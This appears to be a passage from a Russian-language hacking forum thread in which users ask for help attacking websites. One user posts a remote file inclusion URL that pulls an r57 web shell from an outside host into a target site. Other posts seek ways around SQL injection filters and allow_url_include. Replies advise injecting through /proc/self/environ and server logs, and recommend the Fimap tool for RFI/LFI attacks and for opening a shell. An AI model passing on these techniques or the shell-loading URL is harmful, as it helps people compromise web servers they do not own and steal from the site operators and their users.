потверждение по мыло не нужно! сразу авторизует ну я не знаю может запрос бд какойнить сделать . подскажите а!
Здравствуйте!Подскажите, пожалуйста! Ситуация: Имеется инклудовый сайт, захожу на него шеллом так- site.ru/index.php?page=http://myevilsite.narod.ru/shell.php Открывается полноценное окно шелла.Но, как только пробую выполнить команду или скачать файл, вылетает из шелла обратно на страницу уже без шелла. Пробовал и r57shell 1.24 и другие, одинаково. Может быть сможете что-нибудь посоветовать. Windows NT VIA-008 5.2 build 3790 Microsoft-IIS/6.0 Заранее большое спасибо!!!
моё мнение что нормальльный хостинг-провайдер....при загрузки в ftp.....будет банить шеллы....только ойда ушёл(у меня такая бня была ужо много раз).....
Нашел скулю, но там фильтруются скобки, как можно обойти данную фильтрацию? Она + еще ко всему Blind, а в Blind, насколько я знаю, без скобок никак не обойтись
Не получается! Т.к. если выполнить функцию 0x76657273696F6E2829 (version()) она не будет робит. Сервак приймет это за простую строку и выведет!
Вроде только скобки фильтруются, а если дело в кодировке, то как с этим бороться? Да и версию узнать не смогу =) Т.к. там blind, скобки полюбому будут....
клац Учимся юзать поиск на форуме..Джокестер в свое время создавал данную тему именно для того что бы в вопросах не было простых вопросов... и кстати отличное пособие для начинающих...надо запретить доступ новичков в ''Ваши вопросы по уязвимостям.''...задолбали уже...охренеть вопрос про кодировку
шелл Ребят, помогите с заливкой шелла через инклуд... Имеется скрипт вида <? $page = $_GET['page']; include($page.".html"); ?> не могу залить т.к. на сервере стоит allow_url_include=0, помогите обойти allow_url_include т.е как то впихнуть http:// Или ftp:// если это возможно
Если стоит allow_url_include, ты ничего удаленно не приинклудишь. Пробуй инклудить енвирон, логи апача.
блин(( фигово.... енвирон не пашет, т.е. вообще нет /proc/self/environ а логи апача не грузятся из за их большого размера (((
если вручную не получается, попробуй тулзу Fimap умеет инжектить /proc/self/environ, логи сервера, открывать консоль, парсить сайты с гугла и сканить на rfi/lfi.